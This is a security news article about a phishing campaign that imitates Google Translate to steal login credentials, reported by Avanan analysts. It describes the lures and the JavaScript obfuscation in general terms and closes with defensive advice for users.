Threat analysts at Avanan, a Check Point Software firm, have unearthed a novel phishing campaign mimicking Google Translate in order to lure users.
The hackers are employing the coding methodology to obfuscate phishing sites and make them look authentic to the victim as well as bypass security gateways. Threat actors also use social engineering techniques to convince users they need to respond immediately to an email or lose access to unread messages permanently.
Subsequently, the victims are requested to click on a link incorporated in the email itself. Upon clicking on the link, the users are directed to an info stealer page that seems to be an authentic Google Translate page, with a pre-filled email field that requires only to fill login credentials.
According to a blog post published last week, this is the standard modus operandi employed by hackers as it creates a sense of urgency and forces victims to act irrationally and recklessly by clicking on a malicious link or downloading a malicious attachment. Behind the scenes, the hackers are also employing a lot of JavaScript, including the Unescape command, to hide their true intentions.
Unescape is a function in JavaScript that computes a new string as a single parameter and utilizes it to decode the string encoded by the escape function. The hexadecimal sequence in the string is replaced by the characters they represent when decoded through unescaped command.
“This attack has a little bit of everything. It has unique social engineering at the front end. It leverages a legitimate site to help get into the inbox. It uses trickery and obfuscation to confuse security services,” Jeremy Fuchs, an Avanan cybersecurity threat analyst stated.
To guard against these attacks, users need to be extra vigilant. The researchers recommended users scan the URLs found in messages before clicking on them to ensure the destination is legitimate.
Moreover, users can check the authenticity of emails by paying closer attention to grammar, spelling, and factual inconsistencies within an email. If the users are suspicious regarding where they're coming from or their intentions, they should just ask the original sender to be sure before taking further action.